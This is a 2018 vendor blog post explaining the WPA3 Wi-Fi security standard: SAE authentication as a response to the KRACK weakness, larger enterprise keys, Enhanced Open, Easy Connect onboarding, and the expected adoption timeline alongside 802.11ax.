Posted by Andrew Ross, September 13, 2018
What is the Fuss about WPA3?
After more than a decade, Wi-Fi Alliance has announced WPA3. The next iteration of their Wi-Fi Protected Access (WPA) security requirements for certified devices, WPA3 has been engineered to address most of the cybersecurity concerns the market has had with WPA2. In addition, there are a couple of new features addressing the increasing number of Wi-Fi IoT devices.
The WPA3 includes the following updates:
- Changes in authentication/association protocol to use Simultaneous Authentication of Equals (SAE)
- Increase in the link key size when using Enterprise (EAP) authentication to 192 bits
- Addition of Opportunistic Wireless Encryption (OWE) called Wi-Fi CERTIFIED Enhanced Open™.
- Addition of simplified onboarding of headless devices using the Device Provisioning Protocol called Wi-Fi CERTIFIED Easy Connect™.
The first two items will be a mandatory for any WPA3 certification. The last two are optional and will be driven by the needs of the application. It should also be noted that WPA3 networks will also mandate the use of protected management frames (PMF) to improve their resilience and protect critical data
The use of Simultaneous Authentication of Equals (SAE) is in direct response to an identified weakness in the WPA2 4-way handshake discovered by Vanhoef in 2017 (Known as KRACK). Although there are available patches to protect from the “KRACK attack”, the use of SAE improves the key management process used for encryption of the link and provides several other benefits. Since the keys used for encryption are session based, not linked to a static PSK, hackers will no longer be able to capture amounts of wireless traffic and work off line to determine the shared password. Similarly, any brute force attack will be limited to a single session. As a result, any historical data is protected should a key be hacked for any specific session.
SAE is a well understood technology and has been used with the 802.11s standard for several years. This provides comfort that we are not venturing out into the great wild west of the technology unknown.
The Wi-Fi CERTIFIED Enhanced Open™ feature based on Opportunistic Wireless Encryption (OWE) is born from the increasing use of public Wi-Fi networks and the awareness that a great deal of them use open security for interaction, leaving the client and the networks vulnerable. Some providers of public networks have started to give their patrons passphrases printed on a menu or receipt. Since these are static and, in most cases, easily obtained they provide little to no protection. OWE adds to the authentication process a key exchange between the Access Point and Client, with the resulting pairwise secret then used to encrypt the association process. This means none of the client AP interaction is in the open and at least a minimal amount of protection is provided during the association process. This is an easy fix for protecting users using the public Wi-Fi networks and is something that should have been addressed in earlier updates.
Increasing the key size for the Enterprise class Wi-Fi users and networks is something which is being pushed by the US Government. In fact, it aligns with the Commercial National Security Algorithm (CNSA) suite published by the Committee on National Security Systems (CNSS). The CNSS is part of the US National Security Agency and has been asking for the increased protection for critical networks for several years.
The addition of a simplified onboarding process called Wi-Fi CERTIFIED Easy Connect™ is again something that has been needed for a longtime. The inclusion of the updated onboarding process, designed to replace WPS (Wireless Protected Setup), is a direct response to the increasing number of headless (Devices without screens) Wi-Fi products being introduced into the connected home markets like Alexa, Google Home, Connected light bulbs, etc. Although still in development, Easy Connect promises to provide a simple and standardized provisioning protocol that will allow headless devices to be securely configured for a network using a phone or tablet.
The good news is that everyone is on-board with WPA3 and all major Wi-Fi device manufacturers and equipment suppliers have already announced support for the standard, with some introducing products as early as 2018. The Wi-Fi community has taken its time getting this important update to market. The questions are when will it be available and when will it become a must have?
“…when will WPA3 be a must have technology?”
Although not technically dependent upon each other, many are linking the introduction of the new 802.11ax standard with the broad adoption of WPA3. This makes sense since both hardware and software work is required to make a device fully certifiable to the new standard. Support for the increased key length, for enterprise networks, will require an upgrade to the current devices hardware encryption engines. Most suppliers and manufacturers are expecting broad introduction of 802.11ax devices in 2019, this would suggest adoption of both 11ax and WPA3 technology will start to ramp by 2020.
However, WPA3 certification will not be limited to only the new 802.11ax devices. Support for WPA3 functionality, specifically the mandatory portions, will exist within currently available 802.11ac products as a software update. Availability of these updates will be based upon market demand and will undoubtedly vary between suppliers. Silex is already working closely with Qualcomm to enable WPA3 in our existing products and hope to have a full roadmap early 2019.
Another announcement which is important to the schedule is that a “migration mode” has already been defined for 802.11 infrastructure. This will allow both WPA2 and WPA3 devices to exist on the same network. It shouldn’t be a surprise, as a similar capability existed during the transition from WPA to WPA2. The implication here is that existing and future shipping devices that do not have WPA3 capability are and will continue to be important to the user and their networks. This pushes the must have timeline out by some distance, if no further security issues are discovered within WPA2.
“…. don’t panic!”
If you are a supplier of Wi-Fi equipment, it is not the time to panic. Nor should the infrastructure owners be looking to replace their 11ac networks anytime soon. Remember that WPA2 has been an incredibly secure network protocol, with its underlying encryption yet to be broken. The industry has a vested interest in keeping it secure and will continue to support it even though WPA3 has been announced.
The Wi-Fi Alliance will not start testing until later this year and will not make WPA3 mandatory for Wi-Fi Certification until late 2019 or early 2020. This does not mean all your existing Wi-Fi devices are obsolete, it merely means when looking at your next generation product or considering upgrading your WLAN you have a future option to consider.
Let’s hope it isn’t another ten years before we see the next security update to Wi-Fi.